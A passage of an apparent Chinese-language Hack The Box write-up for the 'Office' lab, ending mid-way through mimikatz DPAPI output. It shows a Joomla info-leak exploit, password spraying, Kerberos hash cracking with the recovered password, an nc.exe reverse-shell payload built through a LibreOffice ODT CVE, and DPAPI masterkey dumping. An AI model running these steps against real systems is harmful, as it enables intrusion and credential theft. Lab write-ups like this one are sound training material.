【season-4】htb office wp

htb-Season-4
35k words

USER

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
└─$ sudo nmap -sS -sV -T4 -A $IP  -p$(sudo nmap -sS -p- $IP --min-rate=5000|grep -i open |awk -F '/' '{print $1}'|tr -s '\n' ',') --min-rate=5000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-19 06:28 EST
Nmap scan report for DC.office.htb (10.10.1x.x)
Host is up (0.45s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.0.28)
|_http-title: Home
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 16 disallowed entries (15 shown)
| /joomla/administrator/ /administrator/ /api/ /bin/ 
| /cache/ /cli/ /components/ /includes/ /installation/ 
|_/language/ /layouts/ /libraries/ /logs/ /modules/ /plugins/
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-19 19:28:59Z)
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
443/tcp   open  ssl/http      Apache httpd 2.4.56 (OpenSSL/1.1.1t PHP/8.0.28)
| tls-alpn: 
|_  http/1.1
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: office.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.office.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.office.htb
| Not valid before: 2023-05-10T12:36:58
|_Not valid after:  2024-05-09T12:36:58
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49671/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc         Microsoft Windows RPC
50285/tcp open  msrpc         Microsoft Windows RPC
56622/tcp open  msrpc         Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022 (88%)
Aggressive OS guesses: Microsoft Windows Server 2022 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Hosts: DC, www.example.com; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2024-02-19T19:30:51
|_  start_date: N/A
|_clock-skew: 7h59m57s

TRACEROUTE (using port 53/tcp)
HOP RTT       ADDRESS
1   196.61 ms 10.10.16.1 (10.10.16.1)
2   196.55 ms DC.office.htb (10.10.11.3)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 210.58 seconds

ldapsearch

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#
#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=office,DC=htb
ldapServiceName: office.htb:dc$@OFFICE.HTB
isGlobalCatalogReady: TRUE
supportedSASLMechanisms: GSSAPI
supportedSASLMechanisms: GSS-SPNEGO
supportedSASLMechanisms: EXTERNAL
supportedSASLMechanisms: DIGEST-MD5
supportedLDAPVersion: 3
supportedLDAPVersion: 2
supportedLDAPPolicies: MaxPoolThreads
supportedLDAPPolicies: MaxPercentDirSyncRequests
supportedLDAPPolicies: MaxDatagramRecv
supportedLDAPPolicies: MaxReceiveBuffer
supportedLDAPPolicies: InitRecvTimeout
supportedLDAPPolicies: MaxConnections
supportedLDAPPolicies: MaxConnIdleTime
supportedLDAPPolicies: MaxPageSize
supportedLDAPPolicies: MaxBatchReturnMessages
supportedLDAPPolicies: MaxQueryDuration
supportedLDAPPolicies: MaxDirSyncDuration
supportedLDAPPolicies: MaxTempTableSize
supportedLDAPPolicies: MaxResultSetSize
supportedLDAPPolicies: MinResultSets
supportedLDAPPolicies: MaxResultSetsPerConn
supportedLDAPPolicies: MaxNotificationPerConn
supportedLDAPPolicies: MaxValRange
supportedLDAPPolicies: MaxValRangeTransitive
supportedLDAPPolicies: ThreadMemoryLimit
supportedLDAPPolicies: SystemMemoryLimitPercent
supportedControl: 1.2.840.113556.1.4.319
supportedControl: 1.2.840.113556.1.4.801
supportedControl: 1.2.840.113556.1.4.473
supportedControl: 1.2.840.113556.1.4.528
supportedControl: 1.2.840.113556.1.4.417
supportedControl: 1.2.840.113556.1.4.619
supportedControl: 1.2.840.113556.1.4.841
supportedControl: 1.2.840.113556.1.4.529
supportedControl: 1.2.840.113556.1.4.805
supportedControl: 1.2.840.113556.1.4.521
supportedControl: 1.2.840.113556.1.4.970
supportedControl: 1.2.840.113556.1.4.1338
supportedControl: 1.2.840.113556.1.4.474
supportedControl: 1.2.840.113556.1.4.1339
supportedControl: 1.2.840.113556.1.4.1340
supportedControl: 1.2.840.113556.1.4.1413
supportedControl: 2.16.840.1.113730.3.4.9
supportedControl: 2.16.840.1.113730.3.4.10
supportedControl: 1.2.840.113556.1.4.1504
supportedControl: 1.2.840.113556.1.4.1852
supportedControl: 1.2.840.113556.1.4.802
supportedControl: 1.2.840.113556.1.4.1907
supportedControl: 1.2.840.113556.1.4.1948
supportedControl: 1.2.840.113556.1.4.1974
supportedControl: 1.2.840.113556.1.4.1341
supportedControl: 1.2.840.113556.1.4.2026
supportedControl: 1.2.840.113556.1.4.2064
supportedControl: 1.2.840.113556.1.4.2065
supportedControl: 1.2.840.113556.1.4.2066
supportedControl: 1.2.840.113556.1.4.2090
supportedControl: 1.2.840.113556.1.4.2205
supportedControl: 1.2.840.113556.1.4.2204
supportedControl: 1.2.840.113556.1.4.2206
supportedControl: 1.2.840.113556.1.4.2211
supportedControl: 1.2.840.113556.1.4.2239
supportedControl: 1.2.840.113556.1.4.2255
supportedControl: 1.2.840.113556.1.4.2256
supportedControl: 1.2.840.113556.1.4.2309
supportedControl: 1.2.840.113556.1.4.2330
supportedControl: 1.2.840.113556.1.4.2354
supportedCapabilities: 1.2.840.113556.1.4.800
supportedCapabilities: 1.2.840.113556.1.4.1670
supportedCapabilities: 1.2.840.113556.1.4.1791
supportedCapabilities: 1.2.840.113556.1.4.1935
supportedCapabilities: 1.2.840.113556.1.4.2080
supportedCapabilities: 1.2.840.113556.1.4.2237
subschemaSubentry: CN=Aggregate,CN=Schema,CN=Configuration,DC=office,DC=htb
serverName: CN=DC,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configurat
 ion,DC=office,DC=htb
schemaNamingContext: CN=Schema,CN=Configuration,DC=office,DC=htb
namingContexts: DC=office,DC=htb
namingContexts: CN=Configuration,DC=office,DC=htb
namingContexts: CN=Schema,CN=Configuration,DC=office,DC=htb
namingContexts: DC=DomainDnsZones,DC=office,DC=htb
namingContexts: DC=ForestDnsZones,DC=office,DC=htb
isSynchronized: TRUE
highestCommittedUSN: 258779
dsServiceName: CN=NTDS Settings,CN=DC,CN=Servers,CN=Default-First-Site-Name,CN
 =Sites,CN=Configuration,DC=office,DC=htb
dnsHostName: DC.office.htb
defaultNamingContext: DC=office,DC=htb
currentTime: 20240218132143.0Z
configurationNamingContext: CN=Configuration,DC=office,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

smbmap没扫出什么有用的

看到web有Joomla并且robots.txt提示的也挺明显的,于是打开看下

web_index

直接搜一下cve印象里近期有过joomla的cve

CVE-2023-23752

https://blog.csdn.net/dahege666/article/details/129728789*

前不久另一台机器上用过的一个信息泄露,在这个web上是存在的,这里正常泄露重点关注的点害是/v1/config/application这部分,不过以防万一害是跑一下他的接口,以防万一。

1
for i in $(cat newurlapi);do curl http://10.10.11.3/api/index.php/$i?public=true -s|wc;echo $i;done

这里我把接口丢在文件里..上面描述漏洞的URL里会有这部分

joomla这个洞需要注意,如果信息量多的话会有多页,所以不要poc跑完就没事了,需要自己手工再看下是不是还有其它页面,或者改一下起止参比如这样http://10.10.11.3/api/index.php/v1/config/application?public=true&page[offset]=0&page[limit]=100这样就可以一个页面上显示100条,默认的话好像是40几..?根据自己需求调整。

web_user_get
这边一个接口出货了,一个用户名”Tony Stark”

http://10.10.11.3/api/index.php/v1/users?public=true&page[offset]=1

用username-anarchy做个字典

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
└─$ ./username-anarchy Tony Stark
tony
tonystark
tony.stark
tonystar
tonys
t.stark
tstark
stony
s.tony
starkt
stark
stark.t
stark.tony
ts

cme跑一下就得到了tstark
一般看到88端口开着通常也会跑着域用户,这边也是出货了一批

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
└─$ kerbrute userenum --dc 10.10.11.3 -d office.htb ~/Desktop/htb/office/wordlist/rockyou.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 02/18/24 - Ronnie Flathers @ropnop

2024/02/18 01:36:24 >  Using KDC(s):
2024/02/18 01:36:24 >   10.10.11.3:88

2024/02/18 01:36:24 >  [+] VALID USERNAME:       tstark@office.htb
2024/02/18 02:16:58 >  [+] VALID USERNAME:       ewhite@office.htb
2024/02/18 02:16:58 >  [+] VALID USERNAME:       etower@office.htb
2024/02/18 02:16:59 >  [+] VALID USERNAME:       dwolfe@office.htb
2024/02/18 02:17:01 >  [+] VALID USERNAME:       dlanor@office.htb
2024/02/18 02:17:01 >  [+] VALID USERNAME:       dmichael@office.htb
2024/02/18 02:17:01 >  [+] VALID USERNAME:       dc@office.htb

用在泄露接口里得到的密码再去跑一下cme

1
2
3
4
5
6
└─$ crackmapexec smb 10.10.11.3 -u worldlistuser  -p 'H0lOgrams4reTakIng0Ver754!'
SMB         10.10.11.3      445    DC               [*] Windows 10.0 Build 20348 (name:DC) (domain:office.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.3      445    DC               [-] office.htb\tstark:H0lOgrams4reTakIng0Ver754! STATUS_LOGON_FAILURE 
SMB         10.10.11.3      445    DC               [-] office.htb\ewhite:H0lOgrams4reTakIng0Ver754! STATUS_LOGON_FAILURE 
SMB         10.10.11.3      445    DC               [-] office.htb\etower:H0lOgrams4reTakIng0Ver754! STATUS_LOGON_FAILURE 
SMB         10.10.11.3      445    DC               [+] office.htb\dwolfe:H0lOgrams4reTakIng0Ver754!

这里我拿着去试了一会web的登录,发现不是这个密码..于是继续去看了smb
在smb里拿到了一个通讯包。
筛去占比最高的443的通讯包,剩下的留着慢慢分析
netpack-1
这里见到krb5的通讯包,我猜是c端在调用smbf服务导致的,所以去查了下他的加密方式
netpack-2
再加上这个本身就和tgt沾点关系,但是我印象不深了..所以感觉这个密钥部分或多或少会是能爆破的

hashcat的格式文档

https://hashcat.net/wiki/doku.php?id=example_hashes

可以看到etype: eTYPE-AES256-CTS-HMAC-SHA1-96 (18)是可以爆破的
于是跑一下拿到密码

1
2
└─$ hashcat '$krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc' -m 19900 /usr/share/wordlists/rockyou.txt --show
$krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc:playboy69

到这里我拿着这密码卡住了,后来朋友提醒才想到拿去换个user去web登录

我joomla的shell还是改模板触发弹出来的,和之前的靶机一样。

进来之后传了因为是个web用户,跑了winpeas捯饬半天也没找到突破口,
记录了一波疑似利用点的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
CredentialEnrollmentManagerUserSvc_938f9(CredentialEnrollmentManagerUserSvc_938f9)[C:\Windows\system32\CredentialEnrollmentManager.exe] - Manual - Stopped
    YOU CAN MODIFY THIS SERVICE: GenericExecute (Start/Stop)
    Credential Enrollment Manager

mysql(mysql)[C:\xampp\mysql\bin\mysqld.exe --defaults-file=c:\xampp\mysql\bin\my.ini mysql] - Auto - Running - No quotes and Space detected                                                                                                                                         
    Possible DLL Hijacking in binary folder: C:\xampp\mysql\bin (Users [AppendData/CreateDirectories WriteData/CreateFiles])

 Apache2.4(Apache Software Foundation - Apache2.4)["C:\xampp\apache\bin\httpd.exe" -k runservice] - Auto - Running
    Possible DLL Hijacking in binary folder: C:\xampp\apache\bin (Users [AppendData/CreateDirectories WriteData/CreateFiles])
    Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28


� Check if you can modify any service https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#services
    LOOKS LIKE YOU CAN MODIFY OR START/STOP SOME SERVICE/s:
    RmSvc: GenericExecute (Start/Stop)
    ConsentUxUserSvc_938f9: GenericExecute (Start/Stop)
    CredentialEnrollmentManagerUserSvc_938f9: GenericExecute (Start/Stop)
    DeviceAssociationBrokerSvc_938f9: GenericExecute (Start/Stop)
    DevicePickerUserSvc_938f9: GenericExecute (Start/Stop)
    DevicesFlowUserSvc_938f9: GenericExecute (Start/Stop)
    PimIndexMaintenanceSvc_938f9: GenericExecute (Start/Stop)
    PrintWorkflowUserSvc_938f9: GenericExecute (Start/Stop)
    UdkUserSvc_938f9: GenericExecute (Start/Stop)
    UnistoreSvc_938f9: GenericExecute (Start/Stop)
    UserDataSvc_938f9: GenericExecute (Start/Stop)
    WpnUserService_938f9: GenericExecute (Start/Stop)
    
    
     Check if you can modify installed software https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#software
    C:\Program Files (x86)\Microsoft\Edge\Application
    ==>  C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20240214004729711_5632.pma (Authenticated Users [DeleteSubdirectoriesAndFiles])                                                                                                                                 
    ==>  C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20240214004730057_7276.pma (Authenticated Users [DeleteSubdirectoriesAndFiles])                                                                                                                                 
    C:\Program Files (x86)\Microsoft\EdgeWebView\Application
    ==>  C:\Program Files (x86)\Microsoft\EdgeWebView\Application\SetupMetrics\20240117095959336_7728.pma (Authenticated Users [DeleteSubdirectoriesAndFiles])                                                                                                                          
    ==>  C:\Program Files (x86)\Microsoft\EdgeWebView\Application\SetupMetrics\20240214004755691_7932.pma (Authenticated Users [DeleteSubdirectoriesAndFiles])
    
    
    RegPath: HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    RegPerms: ppotts [FullControl]
    Key: OneDrive
    Folder: C:\Program Files\Microsoft OneDrive
    File: C:\Program Files\Microsoft OneDrive\OneDrive.exe /background (Unquoted and Space detected)


RegPath: HKLM\Software\Classes\htmlfile\shell\open\command
    RegPerms: S-1-5-21-1199398058-4196589450-691661856-1106 [FullControl]
    Folder: C:\Program Files\Internet Explorer
    File: C:\Program Files\Internet Explorer\iexplore.exe %1 (Unquoted and Space detected)
   =================================================================================================


    RegPath: HKLM\Software\Wow6432Node\Classes\htmlfile\shell\open\command
    RegPerms: S-1-5-21-1199398058-4196589450-691661856-1106 [FullControl]
    Folder: C:\Program Files\Internet Explorer
    File: C:\Program Files\Internet Explorer\iexplore.exe %1 (Unquoted and Space detected)
    
    
        C:\Users\All Users\Microsoft\UEV\InboxTemplates\RoamingCredentialSettings.xml


2023-07-19 22:51           OFFICE\ppotts                                  Word                  C:\xampp\htdocs\internal\applications\msf.docm
  2023-06-06 21:20           OFFICE\ppotts                                  Word                  C:\xampp\htdocs\internal\applications\test.docm
  2023-05-09 16:05           OFFICE\ppotts                                  Word                  C:\xampp\htdocs\internal\applications\asdf-it-30-000-0-5-years-asdf@test-com.doc
  2023-05-09 16:04           OFFICE\ppotts                                  Word                  C:\xampp\htdocs\internal\applications\test-it-30-000-0-5-years-test@test-com.doc
  2023-05-04 18:05           OFFICE\ppotts                                  Office                C:\xampp\htdocs\internal\applications\Doc1.docm
  2023-05-04 18:04           OFFICE\ppotts                                  Word                  C:\Users\Administrator\Desktop\Doc1.docm
  
     C:\xampp\htdocs\internal\applications\123-it-30-000-0-5-years-123asd@a-com_resume.odt(2/18/2024 9:02:49 PM)
    C:\xampp\htdocs\internal\applications(2/18/2024 9:02:49 PM)
    C:\ProgramData\job.txt(2/14/2024 5:35:41 PM)
    C:\Users\PPotts\Music\job_offering.ps1(2/14/2024 5:36:02 PM)
    C:\Users\PPotts\Music(2/14/2024 5:36:02 PM)
    C:\ProgramData(2/14/2024 5:35:41 PM)

传了RunasCs用tstack用户密码,弹了shell回来

接下来netstat -ano看了下,发现除了80之外还有8083开着服务,于是curl一波发现有回包。

frp穿了一下看到是个web,留的点也就只有一个resume.php
local_web
这里我尝试过了一些上古doc的钓鱼,后来发现害得是odt..朋友说他坑完进去看到就只有一个解析odt的地方。

这里用的CVE-2023-2255

python3 CVE-2023-2255.py --cmd 'C:\users\public\downloads\nc.exe xxxx xxxx -e cmd' --output nc.odt

弹回来拿到PPOTTS@OFFICE.HTB

其实这里如果勤快的话winpeas时候就能看到自己多几个缓存的key,
养成习惯手动看的话也行

1
2
3
4
5
6
7
8
9
10
11
12
C:\Program Files\LibreOffice 5\program>cmdkey /list
cmdkey /list

Currently stored credentials:

    Target: LegacyGeneric:target=MyTarget
    Type: Generic 
    User: MyUser
    
    Target: Domain:interactive=office\hhogan
    Type: Domain Password
    User: office\hhogan

但是这里是没法拿出来直接用的
比如执行

1
2
3
4
5
C:\Program Files\LibreOffice 5\program>runas /savecred /user:hhogan "cmd.exe"
runas /savecred /user:hhogan "cmd.exe"
Enter the password for hhogan: 

C:\Program Files\LibreOffice 5\program>

但是可以通过mimikatz导出来的

(dpapi会复杂点但是应该也可以,原理应该不尽相同都会牵扯到域凭证服务调用,之后会单独研究下)

下面是利用的过程:

1.首先定位一下master文件和cred存储文件的位置

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
PS C:\Users\PPotts\AppData\Roaming\microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107> dir -force
dir -force


    Directory: C:\Users\PPotts\AppData\Roaming\microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a-hs-         1/17/2024   3:43 PM            740 10811601-0fa9-43c2-97e5-9bef8471fc7d                                 
-a-hs-          5/2/2023   4:13 PM            740 191d3f9d-7959-4b4d-a520-a444853c47eb                                 
-a-hs-          5/2/2023   4:13 PM            900 BK-OFFICE                                                            
-a-hs-         1/17/2024   3:43 PM             24 Preferred                                                            



PS C:\Users\PPotts\AppData\Roaming\microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107> dir -force C:\Users\PPotts\AppData\Roaming\microsoft\Credentials
dir -force C:\Users\PPotts\AppData\Roaming\microsoft\Credentials

2.调用mimikatz将master文件都先导入

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
    Directory: C:\Users\PPotts\AppData\Roaming\microsoft\Credentials


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a-hs-          5/9/2023   2:08 PM            358 18A1927A997A794B65E9849883AC3F3E                                     
-a-hs-          5/9/2023   4:03 PM            398 84F1CAEEBF466550F4967858F9353FB4                                     
-a-hs-         1/18/2024  11:53 AM            374 E76CCA3670CD9BB98DF79E0A8D176F1E                                     
-a-hs-         2/19/2024   2:27 PM            374 FCC3ECA2B60DDA9204044C22EEC7CC48                                     


PS C:\Users\PPotts\AppData\Roaming\microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107> C:/users/public/downloads/mimikatz.exe
C:/users/public/downloads/mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # dpapi::masterkey /in:"C:\Users\PPotts\AppData\Roaming\microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\10811601-0fa9-43c2-97e5-9bef8471fc7d"
**MASTERKEYS**
  dwVersion          : 00000002 - 2
  szGuid             : {10811601-0fa9-43c2-97e5-9bef8471fc7d}
  dwFlags            : 00000000 - 0
  dwMasterKeyLen     : 00000088 - 136
  dwBackupKeyLen     : 00000068 - 104
  dwCredHistLen      : 00000000 - 0
  dwDomainKeyLen     : 00000174 - 372
[masterkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 8bc9f4a7b9094394e57e92daedeafcb9
    rounds           : 00004650 - 18000
    algHash          : 00008009 - 32777 (CALG_HMAC)
    algCrypt         : 00006603 - 26115 (CALG_3DES)
    pbKey            : f97146093504382ec842cd2eec5f2bbfbbdd83ab6c4e44ada82d5ae23d1a05422fe6d1378165d4434bf41737616acf823e86c69424271d0f72684018a0928045ef77b719003b352644398f4286795b1297bee821deec898cb167aa76d984808014aa0d22136688c3

[backupkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : 26773bc8263172355939bdb9cb33e2f9
    rounds           : 00004650 - 18000
    algHash          : 00008009 - 32777 (CALG_HMAC)
    algCrypt         : 00006603 - 26115 (CALG_3DES)
    pbKey            : 540c745f74ac62c43d245e850eb9952d6daf6a803163b94683eb82a30bf3d20d8e72d4e1003e0f17ca2575722c009e1855333ddacb7f08702369b0035aff50163eee5d2f2384fe28

[domainkey]
  **DOMAINKEY**
    dwVersion        : 00000002 - 2
    dwSecretLen      : 00000100 - 256
    dwAccesscheckLen : 00000058 - 88
    guidMasterKey    : {e523832a-e126-4d6e-ac04-ed10da72b32f}
    pbSecret         : dda74feddaea0b4119723acb88bb3aa033b85d6fd6451d04d0afa95d00c640d33d83f0894c5c62fd6298327c40773512ccad8961131005b450732f72bc3ece29defa2088def5dce8f64ff76641057d473ad0073688c39c491286461b57a38eddbde92f213811ba2ec0f7867cd377df0b860584e3fc082529e7adaa437ebb3ac8c39a567df96bf21ce21bfb7c687b613b678a8be14f1fc6e96c9a16a18c156bc0255e514cfd61eb4d81fa08060c6cd35d330f5a0121ca7126ba667ccb1fbb2f93857f8230e20606b7b69d558b9462012db6e6418acd86d1b9a671d94ff92e5fd3684b099f5a29165a3410ddb9e924b4b31f22428895f37815badf7ec30fe80884
    pbAccesscheck    : a98be73386a3dca744e20b13b967e3bc4a1f58bf9be981bf84cf2e2c4daab8ca4def27d6e22540e7eebadd6c122ed75a1b991532d88794e2e999673385241275fe2735bbbb46f9e88dbd799589b42d572ca6b14ecf279a6d


Auto SID from path seems to be: S-1-5-21-1199398058-4196589450-691661856-1107

[backupkey] without DPAPI_SYSTEM: 
  key : 2c19b1b2f1784e79edaed52a319cc5b4ad42179d4906fd084aef8e6e6dd9b8db
  sha1: 4961d54be229fd871debd903b3d518ea4d362c42

mimikatz # dpapi::masterkey /in:"C:\Users\PPotts\AppData\Roaming\microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb"
**MASTERKEYS**
  dwVersion          : 00000002 - 2
  szGuid             : {191d3f9d-7959-4b4d-a520-a444853c47eb}
  dwFlags            : 00000000 - 0
  dwMasterKeyLen     : 00000088 - 136
  dwBackupKeyLen     : 00000068 - 104
  dwCredHistLen      : 00000000 - 0
  dwDomainKeyLen     : 00000174 - 372
[masterkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : c521daa0857ee4fa6e4246266081e94c
    rounds           : 00004650 - 18000
    algHash          : 00008009 - 32777 (CALG_HMAC)
    algCrypt         : 00006603 - 26115 (CALG_3DES)
    pbKey            : 1107e1ab3e107528a73a2dafc0a2db28de1ea0a07e92cff03a935635013435d75e41797f612903d6eea41a8fc4f7ebe8d2fbecb0c74cdebb1e7df3c692682a066faa3edf107792d116584625cc97f0094384a5be811e9d5ce84e5f032704330609171c973008d84f

[backupkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : a2741b13d7261697be4241ebbe05098a
    rounds           : 00004650 - 18000
    algHash          : 00008009 - 32777 (CALG_HMAC)
    algCrypt         : 00006603 - 26115 (CALG_3DES)
    pbKey            : 21bf24763fbb1400010c08fccc5423fe7da8190c61d3006f2d5efd5ea586f463116805692bae637b2ab548828b3afb9313edc715edd11dc21143f4ce91f4f67afe987005320d3209

[domainkey]
  **DOMAINKEY**
    dwVersion        : 00000002 - 2
    dwSecretLen      : 00000100 - 256
    dwAccesscheckLen : 00000058 - 88
    guidMasterKey    : {e523832a-e126-4d6e-ac04-ed10da72b32f}
    pbSecret         : 159613bdc2d90dd4834a37e29873ce04c74722a706d0ba4770865039b3520ff46cf9c9281542665df2e72db48f67e16e2014e07b88f8b2f7d376a8b9d47041768d650c20661aee31dc340aead98b7600662d2dc320b4f89cf7384c2a47809c024adf0694048c38d6e1e3e10e8bd7baa7a6f1214cd3a029f8372225b2df9754c19e2ae4bc5ff4b85755b4c2dfc89add9f73c54ac45a221e5a72d3efe491aa6da8fb0104a983be20af3280ae68783e8648df413d082fa7d25506e9e6de1aadbf9cf93ec8dfc5fab4bfe1dd1492dbb679b1fa25c3f15fb8500c6021f518c74e42cd4b5d5d6e1057f912db5479ebda56892f346b4e9bf6404906c7cd65a54eea2842
    pbAccesscheck    : 1430b9a3c4ab2e9d5f61dd6c62aab8e1742338623f08461fe991cccd5b3e4621d4c8e322650460181967c409c20efcf02e8936c007f7a506566d66ba57448aa8c3524f0b9cf881afcbb80c9d8c341026f3d45382f63f8665


Auto SID from path seems to be: S-1-5-21-1199398058-4196589450-691661856-1107

[backupkey] without DPAPI_SYSTEM: 
  key : 4d1b2c18baba7442e79d33cc771bf54027ae2500e08da3ecfccf91303bd471b6
  sha1: eeb787c4259e3c8b8408201ee5e54fc29fad22b2

3.这边解密获得masterkey其实是需要密码 但是如果我们直接master文件模拟用户去调用域内服务,就可以做到类似key窃取的操作,直接拿到key缓存,所以这边我调用了/rpc,因为有俩master文件一会不一定调用哪个,所以都抓一下缓存

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
mimikatz # dpapi::masterkey /in:"C:\Users\PPotts\AppData\Roaming\microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb" /rpc
**MASTERKEYS**
  dwVersion          : 00000002 - 2
  szGuid             : {191d3f9d-7959-4b4d-a520-a444853c47eb}
  dwFlags            : 00000000 - 0
  dwMasterKeyLen     : 00000088 - 136
  dwBackupKeyLen     : 00000068 - 104
  dwCredHistLen      : 00000000 - 0
  dwDomainKeyLen     : 00000174 - 372
[masterkey]
  **MASTERKEY**
    dwVersion        : 00000002 - 2
    salt             : c521daa0857ee4fa6e4246266081e94c
    rounds           : 00004650 - 18000
